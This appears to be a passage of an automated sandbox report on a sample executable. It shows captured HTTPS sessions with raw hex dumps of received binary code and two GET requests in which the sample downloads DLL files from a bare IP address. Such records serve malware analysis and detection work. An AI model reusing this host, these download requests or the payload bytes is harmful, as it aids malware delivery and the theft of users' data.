                                                                                                                                                                                                            2024-10-23 05:03:47 UTC16384INData Raw: ff ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d
                                                                                                                                                                                                            Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc
                                                                                                                                                                                                            2024-10-23 05:03:47 UTC16384INData Raw: e9 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05
                                                                                                                                                                                                            Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                                                                                                                                                            2024-10-23 05:03:47 UTC16384INData Raw: 00 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0
                                                                                                                                                                                                            Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                                                                                                                                                            2024-10-23 05:03:48 UTC16384INData Raw: e9 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc
                                                                                                                                                                                                            Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                                                                                                                                                            2024-10-23 05:03:48 UTC16384INData Raw: 04 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24
                                                                                                                                                                                                            Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$
                                                                                                                                                                                                            2024-10-23 05:03:48 UTC16384INData Raw: 81 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33
                                                                                                                                                                                                            Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3
                                                                                                                                                                                                            2024-10-23 05:03:48 UTC16384INData Raw: 0b 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00
                                                                                                                                                                                                            Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                                                                                                                                            2024-10-23 05:03:48 UTC16384INData Raw: 10 b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24
                                                                                                                                                                                                            Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            14192.168.2.65000495.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:03:49 UTC199OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:03:49 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:49 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 450024
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Last-Modified: Wednesday, 23-Oct-2024 05:03:49 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-10-23 05:03:49 UTC16121INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                                                                                                            2024-10-23 05:03:49 UTC16384INData Raw: 00 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00
                                                                                                                                                                                                            Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mn
                                                                                                                                                                                                            2024-10-23 05:03:50 UTC16384INData Raw: 00 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
                                                                                                                                                                                                            2024-10-23 05:03:50 UTC16384INData Raw: 18 d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9
                                                                                                                                                                                                            Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]
                                                                                                                                                                                                            2024-10-23 05:03:50 UTC16384INData Raw: 6a 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74
                                                                                                                                                                                                            Data Ascii: jatAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                                                                                                                                            2024-10-23 05:03:50 UTC16384INData Raw: 85 c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00
                                                                                                                                                                                                            Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
                                                                                                                                                                                                            2024-10-23 05:03:50 UTC16384INData Raw: f0 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e
                                                                                                                                                                                                            Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
                                                                                                                                                                                                            2024-10-23 05:03:50 UTC16384INData Raw: e8 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7
                                                                                                                                                                                                            Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
                                                                                                                                                                                                            2024-10-23 05:03:50 UTC16384INData Raw: cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06
                                                                                                                                                                                                            Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv
                                                                                                                                                                                                            2024-10-23 05:03:50 UTC16384INData Raw: f6 e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57
                                                                                                                                                                                                            Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            15192.168.2.65000595.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:03:51 UTC199OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:03:51 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:51 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 257872
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Last-Modified: Wednesday, 23-Oct-2024 05:03:51 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-10-23 05:03:51 UTC16121INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
